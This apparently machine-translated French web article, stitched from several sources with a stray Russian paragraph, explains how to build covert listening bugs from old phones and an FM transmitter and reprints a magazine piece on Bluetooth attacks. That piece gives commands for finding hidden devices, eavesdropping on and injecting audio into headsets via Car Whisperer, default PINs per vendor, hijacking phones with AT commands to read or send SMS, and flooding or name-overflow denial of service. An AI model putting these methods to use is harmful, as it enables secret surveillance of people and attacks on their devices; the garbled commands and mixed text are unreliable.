Conseils utiles

Comment créer un bug de vos propres mains: schéma et description détaillée

Pin
Send
Share
Send
Send


Si nécessaire, pour écouter une conversation au téléphone, il n'est pas du tout nécessaire de mettre un bogue dans votre poche ou de connecter un périphérique d'écoute. Le téléphone portable d’une victime suffit.

Au bon moment, votre téléphone composera un certain numéro de manière autonome et imperceptible, et un attaquant intéressé pourra écouter votre conversation jusqu'à ce qu'il raccroche.

Et si le téléphone portable est près de vous, vous pouvez être assuré que la conversation ne sera pas seulement entendue, mais également enregistrée. Et la distance qui vous sépare du lieu de l’écoute électronique n’a pas d’importance.

Au fait, dans le téléphone, dans les appels sortants, il n'y aura aucune trace de l'appel "de gauche", et vous ne pourrez pas savoir que vous avez été écouté. Difficile à croire? Hélas, c'est comme ça. Bien que tous les téléphones cellulaires ne puissent pas être utilisés par des fraudeurs.

Il existe un segment de consommateurs qui préfèrent les smartphones de classe affaires. Ce type d'appareil se distingue par ses capacités étendues et son design attrayant, mais en même temps, ce smartphone présente également de nombreuses vulnérabilités. En utilisant ces vulnérabilités, une personne intéressée peut faire une écoute électronique contrôlée par elle depuis votre smartphone, et vous ne le saurez même pas.

Et même si un attaquant se trouve de l’autre côté du monde, il sera tout à fait capable d’initialiser un appel pour écouter votre téléphone cellulaire. Et voler le téléphone de la «victime» pour installer le «bogue» n'est pas nécessaire du tout - certaines marques de téléphones vous permettent de les appeler à distance sans appuyer sur les boutons de l'appareil et même (!) Sans connaître le numéro.

Fondements juridiques

Bien sûr, vous devez comprendre que l'équipement spécial d'écoute est la prérogative des services spéciaux. En cas de violation des droits constitutionnels de l'individu et de culpabilité avérée dans la violation du secret de la vie privée, des sanctions administratives suivront. Les cas de responsabilité pénale sont fréquents. Par conséquent, n'abusez pas du produit fabriqué. Il est beaucoup plus judicieux d'utiliser un tel dispositif comme moyen de sécurité supplémentaire ou de l'utiliser pour exercer un contrôle acoustique sur le territoire de votre propre maison. Par exemple, un bogue auto-fabriqué pour l'écoute électronique deviendra un excellent "informateur" si vous n'êtes pas sûr de la décence de la nounou que vous avez embauchée ou si vous voulez savoir ce qui se passe dans la salle de classe. Oui, vous ne connaissez jamais les situations de la vie où l'utilisation d'appareils d'écoute devient une nécessité.

Contenu de l'article

Tout le monde le sait avec Bluetooth Vous pouvez transférer un fichier d'un périphérique à l'autre ou connecter un casque sans fil. Mais cela ne se limite pas à ses capacités. Avoir le bon outil avec vous peut faire de vrais miracles. Alors pourquoi ne pas vous essayer en tant que magicien?

Module technologique intégré Bluetooth (ou, plus formellement, IEEE 802.15.3) a depuis longtemps cessé d'être une curiosité. Le coût du module est tellement insuffisant qu'il n'est pas intégré dans un portable, un ordinateur portable ou un assistant personnel par un fabricant paresseux. Et même cela - pour des raisons de marketing. En un mot Bluetooth utilisez presque tout. Mais seuls quelques-uns savent que, utilisant la technologie, ils risquent de publier leurs données confidentielles. Mais commençons par le bien!

Mobile GSM bug: une solution incroyablement simple

Pour créer un périphérique d'écoute à partir d'un téléphone portable, vous avez besoin d'un périphérique qui prend en charge la fonction "Décrochage automatique", vous avez également besoin d'un casque. L’appareil Nokia 1280 peut être considéré comme le plus acceptable à ces fins, car la simplicité et la fiabilité du téléphone peuvent compter sur le succès du projet en cours. À propos, l'écran noir et blanc est un signe de rentabilité, la consommation d'énergie de l'appareil est considérablement réduite. Croyez-moi, un tel bug du téléphone, réglé de vos propres mains, est un excellent substitut à un équipement d'écoute coûteux. De plus, pour effectuer les actions simples décrites ci-dessous, tout le monde peut le faire. Commençons.

  • Allez dans le menu du téléphone et entrez dans la section «Mode appel».
  • Créez votre propre mode personnel. Tous les éléments relatifs à l’indication lumineuse, aux vibrations, au volume de la mélodie du signal, à l’économiseur d’écran, à l’accompagnement sonore pour appuyer sur les touches et à la notification d’un message SMS entrant doivent être désactivés.
  • Donnez un nom au nouveau mode.
  • Dans le menu principal, accédez à la section «Configuration des accessoires», qui comprend généralement deux sous-éléments «casque» et «aide auditive». Dans chacun d’eux, il est nécessaire d’éditer les paramètres de fonctionnement et la question de savoir comment faire un bogue sera pratiquement résolue.
  • Tous les "accessoires" doivent être inclus. Activez le nouveau mode créé et quittez les paramètres.
  • Coupez le cordon du casque et insérez la fiche dans la prise du casque.
  • L'écran devrait afficher le mode activé.

Astuce 1: Utiliser BT pour accéder à distance à un ordinateur

D'une manière ou d'une autre, pour une présentation, j'ai invité une petite amie aux jambes longues - appuyez sur la barre d'espace pour faire défiler les diapositives dans Power Point. Ce plaisir m'a coûté un déjeuner coûteux et deux heures de conversation vide avec une fille Barbie. Après cela, j’ai décidé fermement: la prochaine fois, j’éviterai différemment le problème de l’absence de télécommande. Et il se promenait avec son téléphone portable! Oui, oui, dès le téléphone, vous pouvez parcourir les diapositives, contrôler la musique - et Dieu sait quoi faire d'autre. L'essentiel est que les modules BT soient installés sur le téléphone portable et sur l'ordinateur. Non seulement vous ferez des économies d’argent et d’efforts, mais vous aurez aussi l’air impeccablement à la mode. Pour montrer un tel tour est capable à quiconque qui utilitaire zauzayet
Télécommande Bluetooth
, pas si longtemps mis à jour à la version 3.0. Il vous permet de contrôler votre ordinateur depuis l'écran de n'importe quel téléphone mobile. Tout est très simple. Un composant serveur spécial est installé sur l'ordinateur et un programme client écrit en Java est installé sur le téléphone (MIDP 2.0 est requis). Après avoir configuré un schéma simple, vous pouvez contrôler à distance la souris et le clavier de l'ordinateur. Et surtout, vous aurez accès au bureau distant. Real Remote Desktop directement depuis l'écran de votre téléphone mobile! Eh bien, avec une petite amie aux longues jambes, le temps peut être dépensé beaucoup plus efficacement. Télécommande Bluetooth être pratique ici: mettre
musique romantique :).

Nous utilisons le smartphone à d'autres fins

Lorsque vous partez en voyage d’affaires ou en vacances, vous pouvez laisser une sorte de gardien, pour ainsi dire un «gardien» mobile à la maison. Et vous n’avez pas besoin de souder quoi que ce soit, et le bug de la cellule est un smartphone retravaillé de vos propres mains. Tout le reste n'est que primitif.

  • Presque tous les smartphones sont équipés de la fonction "Accepter automatiquement les appels".
  • Dans les unités cellulaires relativement nouvelles, la technologie du mode économie d'énergie est mise en œuvre. Par conséquent, lorsque vous prenez en compte l’état manifestement sain de l’appareil, vous pouvez compter sur 5 à 7 jours de fonctionnement de votre batterie.
  • Une variante est possible lorsque le téléphone est connecté au chargeur, et un appareil spécial avec relais temporisé sert d’intermédiaire entre la prise de courant et le chargeur. Une heure par jour est un mode de mise sous tension parfaitement acceptable (compte tenu de la situation décrite ci-dessus).
  • Désactivez la notification sonore, l’indication de la lumière et le mode de vibration du téléphone.
  • Une action consistant à installer un casque dans la prise casque ne sera pas superflue, car le bruit de fond sonore autour de l'appelant sera un signal défavorable qui déterminera l'emplacement du dispositif espion.
  • Placez l'appareil dans la partie centrale de l'espace de vie. Ne pas oublier: l'appareil ne doit pas être dans un endroit bien en vue, mais une armoire n'est pas une solution. Placez le téléphone sur la mezzanine ou fixez-le au dos de la photo suspendue.

Trick 2: Contrôle d'accès avec BT

Si vous travaillez dans une pièce réunissant une douzaine de collègues, vous avez probablement dû verrouiller votre ordinateur lorsque vous quittez une autre pièce. Et quoi? N'as pas le temps de t'éloigner, car quelqu'un fouille déjà ton dur. La mise en page n'est pas la plus agréable. En général, vous devez verrouiller l'ordinateur. La question est de savoir comment. Vous pouvez utiliser les fonctionnalités standard de Windows et entrer un mot de passe long dix fois par jour. Ou le faire magnifiquement avec la technologie Bluetooth. Tout est aussi simple que deux et deux. Vous vous éloignez de l'ordinateur - et il est immédiatement bloqué. Vous revenez - et Loka comme c'est arrivé! La seule condition: le module doit être installé à la fois sur l'ordinateur et sur le téléphone portable
Bluetooth, et le programme est installé dans le système LockItNow (vous pouvez facilement écrire un tel programme vous-même, nous avons eu un article entier). Cependant, amis et collègues peuvent parler de possibilités télépathiques, puis vendre le secret pour de l'argent :). Soit dit en passant, si vous n’avez pas de module BT sous la main, vous pouvez le remplacer par un téléphone prenant en charge la «dent bleue» (brancher via le port COM).

Bug pour l'écoute électronique: faites-le vous-même à partir de "moyens improvisés"

En règle générale, les vieux téléphones ne sont pas jetés. Trouvez le «camarade électronique» oublié depuis longtemps, car c'est grâce à lui que vous ferez un appareil de capture du son efficace. Il est à noter que presque tous les téléphones peuvent être convertis en un appareil d’écoute. Cependant, les dimensions jouent un rôle important dans la "vie d'espionnage". Par conséquent, dans un domaine aussi délicat que l’écoute électronique, il est préférable d’utiliser des modèles de téléphone de petite taille.

Astuce 3: Nous supprimons le trafic BT de l'air

La maîtrise commence par la compréhension. Avez-vous déjà eu envie de consulter le protocole et de savoir comment les données sont échangées via la «dent bleue»? Écoute du trafic Bluetooth ne peut être effectué que "en soi", c’est-à-dire qu’il intercepte le trafic entrant et sortant du nœud sur lequel vous avez donné la commande. À cet égard, l’interface HCI (Host Controller Interface), qui permet d’accéder à l’émetteur, n’a aucune importance non plus. Le nœud HCI se connecte généralement au nœud du pilote de périphérique Bluetooth (flux entrant) et au noeud L2CAP (flux sortant). La plate-forme Windows par défaut ne fournit pas une telle opportunité. Cependant, les développeurs tiers ont publié
pilotes spéciaux qui permettent traduire le dongle standard en renifleur. Le travail est traditionnellement indicatif à cet égard. Analyseur de protocole Bluetooth sans fil FTS4BTdebout de l'argent fou. Le produit rattrape le fait qu’il supporte le nouveau Bluetooth v2.0 + EDRsur la base de laquelle les appareils modernes fonctionnent et, en outre, il est capable de décoder le trafic de l'air à la volée, en triant avec précision l'audio, les données de protocole d'application et bien plus encore. Il est clair que pour la plongée (et effectivement) les clés USB les plus pertinentes sont la classe 1, dont le rayon atteint cent mètres.

Organigramme général

  • Démontez le téléphone.
  • Prenez un écran et supprimez toutes les DEL (rétro-éclairage du clavier - laissez-en un pour le contrôle visuel).
  • Souder le bouton d'alimentation.
  • Effectuez l'installation de l'appareil - «Appel en réception automatique», car le bogue entre vos mains doit prendre le téléphone.
  • Remplacez le microphone par un autre plus sensible (électret).
  • Augmentez l’antenne (fil de cuivre ordinaire de 15 à 20 cm).
  • Souder la batterie et la fixer sur le dessus du clavier (élastique, ruban adhésif).
  • Vérifiez la performance.

L'optocoupleur présenté dans le schéma peut être remplacé par un transistor de type KT315 ou des analogues de Western C9018, C9014. Dans ce cas, le condensateur est retiré et la résistance est définie avec une valeur de résistance de 2,2 k.

Astuce 4: travailler directement avec l'adaptateur BT

Long temps Les piles Bluetooth pour Windows offraient de telles possibilitésque les programmeurs ont simplement contourné cette plate-forme. Cela explique que la plupart des programmes de divertissement sérieux avec une «dent bleue» sont développés pour la plate-forme Niks. Nous allons analyser quelques astuces sur cette plateforme, à savoir Freebsd (Je vous rappelle que sur le disque du numéro précédent, nous avons téléchargé la dernière version 7.0 de ce système d'exploitation). La technologie elle-même Bluetooth officiellement commencé à être pris en charge uniquement à partir de la 5ème branche basée sur le sous-système Netgraph. Je suis heureux que la plupart des adaptateurs USB soient compatibles avec le pilote ng_ubt (il doit être installé avant de connecter le périphérique). Allons-nous essayer?

  1. Nous connectons le périphérique: kldload ng_ubt
  2. Copiez le script de chargement de la pile dans un endroit pratique: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Copiez le script de chargement de pile dans un endroit approprié et exécutez la commande suivante: sh /usr/local/etc/rc.bluetoots start ubt0

Maintenant, je veux vous présenter l'utilitaire hccontrol. C'est l'un des principaux programmes permettant de travailler avec le module BT. C'est elle qui effectue toutes les opérations liées à l'interface HCI et qui a la syntaxe suivante: hccontrol –n. Vérifions la fonctionnalité de notre appareil, scrutons l'éther pour détecter la présence d'appareils:

hccontrol –n ubt0hci Enquête

En conséquence, l'utilitaire affichera des informations sur les périphériques trouvés, y compris leurs adresses MAC. Il convient de noter que chacun des périphériques Bluetooth, qu’il s’agisse d’un casque ou d’un téléphone ordinaire, représente un certain ensemble de services.. La liste de base comprend les éléments suivants: CIP (accès RNIS commun), CTP (téléphonie sans fil), DUN (accès réseau à distance), FAX (FAX), FTRN (Transfert de fichiers Obex), HSET (Casque), NAP (Point d'accès réseau) . Pour déterminer les services fournis par un périphérique particulier, une requête est utilisée sur un protocole SPD spécial (Service Descovery Protocol). Le serveur SPD s’exécute directement sur la machine hôte et est exclusivement un composant d’information (l’affecte
impossible). Vous pouvez déterminer les services fournis par les périphériques trouvés à l'aide de l'utilitaire approprié:

# spdcontrol -a browse

Astuce 5: Trouver des périphériques cachés

Nous avons donc analysé la diffusion et avons même découvert quels services étaient disponibles sur les appareils actifs. Mais voici le piège! Certains appareils ne signalent pas leur présence de quelque manière que ce soit, car ils sont en mode «Mode introuvable» et ne répondent pas aux demandes de diffusion. Selon les paramètres de votre téléphone, vous connaissez probablement une option de sécurité similaire. Cependant vous pouvez toujours détecter de tels dispositifs!

La technique la plus connue pour les détecter est la recherche stupide d’adresses MAC, c’est-à-dire l’envoi séquentiel de requêtes à différentes adresses à partir d’une certaine plage. Pour ce faire, vous devez utiliser un utilitaire très simple, Redfang, qui parcourt les six derniers octets de l'adresse du périphérique et détecte ainsi les périphériques cachés.

Une autre option est d'utiliser techniques passives: mettez votre appareil en mode veille tout en attribuant un nom attrayant au réseau:

hciconfig hci0 nom BT_YANDEX
hciconfig hci0 bas
hciconfig hci0 up
hcidump -V | grep bdaddr

En conséquence, toutes les connexions entrantes seront affichées, parmi lesquelles les camarades avec des identifiants cachés peuvent facilement l'être.

Truc 6: Intercepter des conversations au casque depuis les airs

L'une des principales menaces de la technologie radio est que les données peuvent être interceptées. La première chose qui me vient à l’esprit en ce qui concerne Bluetooth est écouter les conversations des personnes utilisant le casque. Et souvent c'est vrai! Au festival des hackers Qu'est-ce que le hack aux Pays-Bas, des experts du groupe Trifinite ont montré comment utiliser un ordinateur portable sous Linux, un programme spécial et une antenne directionnelle Écoute de ce que le conducteur parle à travers le casque Bluetooth voiture qui passe. Le groupe a développé un programme Chuchoteur de voiture ("The Whisperer Automobile"). Les capacités du programme sont relativement limitées: vous ne pouvez écouter que ceux qui ont oublié de modifier les mots de passe d’accès Bluetooth
«0000» ou «1234». Mais croyez-moi, il y a beaucoup de gens si pauvres! "Sheptun" est capable de caler et de passer avec succès le "couplage" de périphériques, en recevant des informations transmises par le karkit ou le casque au téléphone mobile. Je veux faire attention: l'utilitaire vous permet non seulement de transférer les informations entre le casque et le téléphone portable, mais également d'y injecter les vôtres. Nous avons décidé de tester les capacités de ce programme en téléchargeant Chuchoteur de voiture du site de développeurs.

Avant de commencer l'opération, il est recommandé de changer la classe de votre appareil, surtout si le programme sera utilisé à partir d'un ordinateur:

classe d'adaptateur hciconfig 0x500204
# 0x500204 est la classe "téléphone"

Sinon, certains appareils «intelligents» peuvent soupçonner que quelque chose ne va pas. Nous examinons la syntaxe de l'utilitaire, qui ressemble à ceci:

./carwhisperer "ce que nous intégrons dans la ligne" "ce que nous capturons à partir de la ligne" "adresse du périphérique" [canal]

Nous avons pris le fichier incorporé directement dans le dossier de l'utilitaire, et out.raw a été spécifié comme sortie:

./carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73

La sortie est le fichier out.raw. Vous ne pouvez pas l'écouter sous sa forme pure: vous devez le convertir au format audio, ce qui nécessite un utilitaire supplémentaire. Beaucoup de convertisseurs audio feront, par exemple, SoX:

raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 sorties.wav

En plus de l'écoute, vous pouvez vous connecter, consulter l'annuaire téléphonique et tirer parti d'autres fonctionnalités «mains libres» avec Bluetooth. Le principe est le suivant: tout d'abord, les périphériques actifs sont recherchés et vérifiés pour le service HS (Head Set). Ensuite, l'adresse MAC du périphérique est examinée et une tentative de connexion à l'aide d'une clé standard est effectuée. Si la connexion est établie, vous pouvez faire tout ce que vous voulez avec l'appareil (dans la liste des commandes AT disponibles).

En pratique, ceci est comme suit. Tout d'abord, tous les casques actifs sont recherchés à l'aide de la commande «sdptool search HS», qui affiche à peu près ce qui suit:

Enquête.
Recherche de HS sur 00: 0A: 3A: 54: 71: 95.
Nom du service: casque
Service RecHandle: 0x10009
Liste d'identifiant de classe de service:
"Casque" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

Nokia (00:02:EE. ) - pin="5475"
Audi UHV (00:0E:9F. ) - pin="1234"
O'Neill (00:80:37. ) - pin="8761"
Cellink (00:0A:94. ) - pin="1234"
Eazix (00:0C:84. ) - pin="1234"

Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам. При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

Astuce 7: appareils DDoS BT

L'approche est traditionnelle. Les DDoS sont vraiment possibles lorsque le périphérique hôte («maître») fonctionne plusieurs fois mieux que le client. Cette situation s'appelle une attaque par déni de service. Cela pourrait accrocher le téléphone ou entraîner une décharge rapide de la batterie. Il y a plusieurs façons de mener une attaque. Commençons par les outils standard. La chose la plus évidente consiste à envoyer une requête ping au périphérique avec des paquets volumineux. Cela peut être fait en spécifiant le drapeau l2ping en tant que paramètre “-s”:

# l2ping -s 10000 -b "adresse MAC"

Comme vous l'avez déjà compris, le programme lui-même est un parent de ping dans un environnement Bluetooth et sert à vérifier la connexion et la présence d'une connexion. Une autre méthode, fondamentalement différente de la première, consiste à utiliser la technique du «fuzzing» - une sorte de technique de loterie, car on ne sait pas à l’avance ce qui va se passer. Il s'agit d'une nouvelle tendance dans l'identification des vulnérabilités dans les produits sans analyse de code source. La technique repose uniquement sur une communication interactive avec l'objet dans un langage qui lui est compréhensible, mais avec des arguments absolument chaotiques et des valeurs variables. La tâche du pirate consiste à faire en sorte que le nom visible du téléphone se compose d’un nombre suffisant d’éléments. Lors de la détection par son "maître" dans 70%
En cas de débordement ou de déni de service:

hciconfig hci0 nom `perl -e 'print" ash "x 3137``
# Team for Linux
hccontrol –n adaptateur change_local_name “nouveau nom”)
# exemple pour FreeBSD

De nombreux téléphones ne peuvent toujours pas digérer les fichiers de bombe. Voici une implémentation simple de cette technique.

  1. Préparez d'abord la "bombe". Exemple bien connu:
    echo `perl -e 'print" skvz "x 3137``> fichier
  2. Ensuite, ils utilisent un utilitaire modifié pour interagir avec OBEX - USSP PUSH (xmailserver.org/ussp-push.html).
    ./obextool fichier push 00: 0A: 3A: 54: 71: 95 `perl -e 'print" skvz "x 3137`` 3


Article complet
lire dans le numéro d'avril de Hacker!
Vous trouverez sur notre disque les versions complètes des programmes décrits dans l'article, ainsi qu'une sélection complète de la documentation Bluetooth et des vulnérabilités de cette technologie.

Est-il possible de se défendre contre les attaques d'intrus

Est-il possible d'écouter la conversation sur un téléphone portable? Hélas, il n'y a pas de protection de la qualité. Dans le même temps, il convient de noter que tous les téléphones ne sont pas concernés par cette vulnérabilité. Pour certains modèles, le micro-casque doit être authentifié.

Une option consiste à appliquer un correctif qui ferme un tel «trou» dans le micrologiciel du téléphone.

Et lors d'une conversation confidentielle importante, le téléphone doit être éteint. Mieux encore, utilisez des suppresseurs d'écoute électronique.

Chef d'équipe de support techniqueZakharov Vladimir

Bug miniature

Avec vos propres mains, vous pouvez créer un émetteur FM. Un circuit assez simple vous permettra de recevoir un signal dans la gamme de fréquences radio 88-92 MHz. Vous ne devez pas courir immédiatement au magasin et acheter des pièces, vous avez peut-être un équipement électrique défectueux, sur lequel vous pouvez démonter les composants nécessaires.

  • Transistor bipolaire - 2N3904 ou son analogue.
  • Résistances - 4,7 et 330 kOhm.
  • Condensateurs - 4,7 pF, 1 et 22 nF.
  • Condensateur ajustable de 30 pF.
  • Bobine de contour - diamètre d'enroulement 6 mm, huit tours, fil 0,5 mm.
  • Le matériau de la planche est une feuille de fibre de verre.
  • Type de batterie "Krona" à 9 watts.
  • Microphone à électret (le plus sensible est utilisé dans les magnétophones).

Mettre un bug FM à l'écoute électronique

  • Tout d'abord, le condensateur d'accord est soudé (au centre de la carte). Le transistor est monté à gauche.
  • En bas, nous installons (de gauche à droite) des condensateurs: le premier - 4,7 pF, le second - 1 nF.
  • Maintenant, soudez les résistances.
  • Après - un condensateur de 22 nF et une bobine sans cadre.
  • Le fil - antenne, installation du microphone et soudure de la batterie complète la conception.

En conclusion

Maintenant, ce n’est plus un secret pour vous de créer un bogue sur votre téléphone et de savoir ce qui est nécessaire pour cela. Les options pour les produits GSM et radio présentées dans cette revue d’informations ne sont qu’une partie des nombreux échantillons électroniques disponibles, grâce auxquels vous pouvez établir un contrôle acoustique de haute qualité. Néanmoins, il convient de noter que l’application des recommandations ci-dessus permet d’obtenir de la praticité et de la qualité. Cependant, il y a peut-être un «artisan» qui trouvera un moyen plus rationnel de réaliser l'excellente performance de ses inventions d'écoute. En attendant, nous utiliserons ce que nous avons. Ecoute bien!

Pin
Send
Share
Send
Send